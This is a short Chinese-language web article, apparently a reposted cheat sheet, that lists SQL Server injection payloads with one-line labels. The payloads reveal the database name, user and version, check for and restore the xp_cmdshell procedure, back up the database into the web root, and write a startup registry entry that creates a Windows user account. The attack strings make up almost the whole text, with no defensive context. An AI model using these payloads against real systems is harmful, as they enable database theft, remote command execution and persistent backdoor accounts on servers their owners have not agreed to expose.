sql注入语句有:返回的是连接的数据库名:and db_name()>0获取连接用户名:and user>0将数据库备份到WEB目录下面:;backup database 数据库名 to disk='c:\inetpub\wwwroot\1
返回的是连接的数据库名:
and db_name()>0
获取连接用户名:
and user>0
;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--
显示SQL系统版本:
and 1=(select @@VERSioN) 或and 1=convert(int,@@version)--
判断xp_cmdshell扩展存储过程是否存在:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
向启动组中写入命令行和执行程序:
;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MacHINE','SOFTWARE\Microsoft\windows\CurrentVersion\
Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
查看当前的数据库名称:
and 0 <> db_name(n) n改成0,1,2,3……就可以跨库了 或and 1=convert(int,db_name())--
--结束END--
本文标题: sql注入语句有哪些
本文链接: https://www.lsjlt.com/news/116377.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-05-07
2024-05-07
2024-05-07
2024-05-07
2024-05-07
2024-05-06
2024-05-06
2024-05-06
2024-05-06
2024-05-06
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0